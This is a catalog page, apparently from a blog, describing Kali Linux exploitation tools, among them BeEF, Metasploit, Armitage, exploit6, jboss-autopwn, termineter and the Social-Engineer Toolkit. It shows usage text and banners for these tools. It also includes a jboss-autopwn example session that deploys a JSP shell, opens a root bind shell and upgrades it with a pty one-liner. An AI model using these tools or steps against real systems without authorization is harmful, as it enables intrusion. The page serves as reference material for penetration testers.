Core dump overflow

Kali tools catalog - Exploitation Tools

BeEF XSS Framework

beef

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

Exploit Database

searchsploit

Exploit Database Archive Search

Usage: searchsploit [options] term1 [term2] ... [termN]
Example: searchsploit oracle windows local

=========
 Options 
=========
   -c            Perform case-sensitive searches; by default, searches will
                 try to be greedy
   -h, --help    Show help screen
   -v            By setting verbose output, description lines are allowed to
                 overflow their columns

=======
 NOTES 
=======
 * Use any number of search terms you would like (minimum: 1)
 * Search terms are not case sensitive, and order is irrelevant

Exploit Development Tools

edb-debugger

A Linux equivalent of the famous Olly debugger on the Windows platform. Some of its features are:

  • Intuitive GUI interface

  • The usual debugging operations (step-into/step-over/run/break)

  • Conditional breakpoints

  • The debugging core is implemented as a plugin, so drop-in replacements are possible. If a given platform has several debugging APIs available, a plugin can implement any of them.

  • Basic instruction analysis

  • View/Dump memory regions

  • Effective address inspection

  • The data dump view is tabbed, allowing you to have several views of memory open at the same time and quickly switch between them.

  • Importing and generation of symbol maps

  • Plugins

NASM shell

This tool provides an easy way to see what opcodes are associated with certain x86 instructions by making use of nasm if it is installed and reachable through the PATH environment variable.

ollydbg

OllyDbg is a 32-bit assembler level analysing debugger for Microsoft Windows. Emphasis on binary code analysis makes it particularly useful in cases where source is unavailable.

Features:

  • Intuitive user interface, no cryptic commands

  • Code analysis – traces registers, recognizes procedures, loops, API calls, switches, tables, constants and strings

  • Directly loads and debugs DLLs

  • Object file scanning – locates routines from object files and libraries

  • Allows for user-defined labels, comments and function descriptions

  • Understands debugging information in Borland® format

  • Saves patches between sessions, writes them back to executable file and updates fixups

  • Open architecture – many third-party plugins are available

  • No installation – no trash in registry or system directories

  • Debugs multithread applications

  • Attaches to running programs

  • Configurable disassembler, supports both MASM and IDEAL formats

  • MMX, 3DNow! and SSE data types and instructions, including Athlon extensions

  • Full UNICODE support

  • Dynamically recognizes ASCII and UNICODE strings – also in Delphi format!

  • Recognizes complex code constructs, like call to jump to procedure

  • Decodes calls to more than 1900 standard API and 400 C functions

  • Gives context-sensitive help on API functions from external help file

  • Sets conditional, logging, memory and hardware breakpoints

  • Traces program execution, logs arguments of known functions

  • Shows fixups

  • Dynamically traces stack frames

  • Searches for imprecise commands and masked binary sequences

  • Searches whole allocated memory

  • Finds references to constant or address range

  • Examines and modifies memory, sets breakpoints and pauses program on-the-fly

  • Assembles commands into the shortest binary form

  • Starts from the floppy disk

pattern create

Generate a string composed of unique patterns

root@kali:/usr/share/metasploit-framework/tools# ./pattern_create.rb 25
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7A

pattern offset

Find the offset in an exploit string where your address to overwrite EIP should be

Usage: pattern_offset.rb <search item> <length of buffer>
Default length of buffer if none is inserted: 8192
This buffer is generated by pattern_create() in the Rex library automatically

Metasploit

World’s most used penetration testing software…the hacker’s best friend. No further description needed.

root@kali:~# msfconsole
[*] Starting the Metasploit Framework console...|
Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

                        (`.         ,-,
                        ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
           ' `    ,   )   .'
              `._ ,  '   /_
                 ; ,''-,;' ``-
                  ``-..__``--`

                             http://metasploit.pro


Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.0-2015013101 [core:4.11.0.pre.2015013101 api:1.0.0]]
+ -- --=[ 1399 exploits - 788 auxiliary - 224 post        ]
+ -- --=[ 356 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > 

Network Exploitation

armitage

Armitage is a scriptable red team collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework.

Through one Metasploit instance, your team will:

  • Use the same sessions

  • Share hosts, captured data, and downloaded files

  • Communicate through a shared event log.

  • Run bots to automate red team tasks.

Armitage organizes Metasploit’s capabilities around the hacking process. There are features for discovery, access, post-exploitation, and maneuver.

exploit6

Exploits various known (CVE-listed) IPv6 vulnerabilities on the destination host.

exploit6 v2.5 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org

Syntax: exploit6 interface destination [test-case-number]

Performs exploits of various CVE known IPv6 vulnerabilities on the destination
Note that for exploitable overflows only 'AAA...' strings are used.
If a system is vulnerable, it will crash, so be careful!

ikat

iKAT is designed to provide access to the underlying operating system of a Kiosk terminal by invoking native OS functionality.

jboss-autopwn

This JBoss script deploys a JSP shell on the target JBoss AS server. Once deployed, the script uses its upload and command execution capability to provide an interactive session.

Features include:

  • Multiplatform support – tested on Windows, Linux and Mac targets

  • Support for bind and reverse bind shells

  • Meterpreter shells and VNC support for Windows targets

Example from the homepage:

Linux bind shell:

[root@nitrogen jboss]# ./e.sh 192.168.1.2 8080 2>/dev/null
[x] Retrieving cookie
[x] Now creating BSH script...
[x] .war file created successfully in /tmp
[x] Now deploying .war file:
http://192.168.1.2:8080/browser/browser/browser.jsp
[x] Running as user...:
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[x] Server uname...:
 Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
[!] Would you like to upload a reverse or a bind shell? bind
[!] On which port would you like the bindshell to listen on? 31337
[x] Uploading bind shell payload..
[x] Verifying if upload was successful...
-rwxrwxrwx 1 root root 172 2009-11-22 19:48 /tmp/payload
[x] You should have a bind shell on 192.168.1.2:31337..
[x] Dropping you into a shell...
Connection to 192.168.1.2 31337 port [tcp/*] succeeded!
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
python -c 'import pty; pty.spawn("/bin/bash")'
[root@nitrogen /]# full interactive shell :-)

termineter

Termineter is a framework written in Python that provides a platform for the security testing of smart meters. It implements the C12.18 and C12.19 protocols for communication; currently supported are meters using C12.19 with 7-bit character sets. Termineter communicates with smart meters over a serial connection through an ANSI type-2 optical probe.

root@kali:~# termineter

   ______              _          __         
  /_  __/__ ______ _  (_)__  ___ / /____ ____
   / / / -_) __/  ' \/ / _ \/ -_) __/ -_) __/
  /_/  \__/_/ /_/_/_/_/_//_/\__/\__/\__/_/   

  <[ termineter                     v0.1.0
  <[ model:                          T-800
  <[ loaded modules:                    12

termineter > show modules

Modules
=======

  Name               Description
  ----               -----------
  brute_force_login  Brute Force Credentials
  dump_tables        Dump Readable C12.19 Tables From The Device To A CSV File
  enum_tables        Enumerate Readable C12.19 Tables From The Device
  get_info           Get Basic Meter Information By Reading Tables
  get_log_info       Get Information About The Meter's Logs
  get_modem_info     Get Information About The Integrated Modem
  get_security_info  Get Information About The Meter's Access Control
  read_table         Read Data From A C12.19 Table
  run_procedure      Initiate A Custom Procedure
  set_meter_id       Set The Meter's I.D.
  set_meter_mode     Change the Meter's Operating Mode
  write_table        Write Data To A C12.19 Table

termineter > 

Social Engineering Toolkit

The Social-Engineer Toolkit is an open-source penetration testing framework designed for Social-Engineering. SET has a number of custom attack vectors that allow you to make a believable attack in a fraction of the time.

      _______________________________
     /   _____/\_   _____/\__    ___/
     \_____  \  |    __)_   |    |
     /        \ |        \  |    |
    /_______  //_______  /  |____|
            \/         \/            

[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
[---]                  Version: 6.3                    [---]
[---]              Codename: '#HugLife'                [---]
[---]        Follow us on Twitter: @TrustedSec         [---]
[---]        Follow me on Twitter: @HackingDave        [---]
[---]       Homepage: https://www.trustedsec.com       [---]

    Welcome to the Social-Engineer Toolkit (SET). 
     The one stop shop for all of your SE needs.

 Join us on irc.freenode.net in channel #setoolkit

   The Social-Engineer Toolkit is a product of TrustedSec.

         Visit: https://www.trustedsec.com

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 
